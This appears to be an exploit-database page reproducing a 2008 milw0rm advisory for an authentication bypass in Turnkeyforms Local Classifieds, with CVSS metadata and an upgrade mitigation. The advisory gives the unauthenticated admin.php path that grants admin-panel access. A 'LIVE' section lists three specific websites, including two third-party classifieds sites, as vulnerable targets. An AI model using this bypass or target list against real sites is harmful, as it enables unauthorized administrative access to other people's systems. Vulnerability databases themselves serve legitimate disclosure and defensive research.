header-logo
Suggest Exploit
vendor:
Local Classifieds
by:
G4N0K
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Local Classifieds
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Turnkeyforms Local Classifieds Auth Bypass Vulnerability

Turnkeyforms Local Classifieds is vulnerable to an authentication bypass vulnerability. An attacker can access the admin panel without authentication by accessing the admin.php page. This vulnerability affects all versions of the software.

Mitigation:

Upgrade to the latest version of Turnkeyforms Local Classifieds.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Turnkeyforms Local Classifieds Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ Turnkeyforms Local Classifieds ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.turnkeyforms.com/local-classifieds.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 12.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ DTLZ ]===
	
	[!] here we go...
	[»]	http://localhost/[paht]/classifieds/Site_Admin/admin.php

	
	
===[ LIVE ]===

	[»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
	[»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
	[»] http://havasufreeads.com/classifieds/Site_Admin/admin.php

	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-12]

Navigation

Suggest Exploit

Services By CQR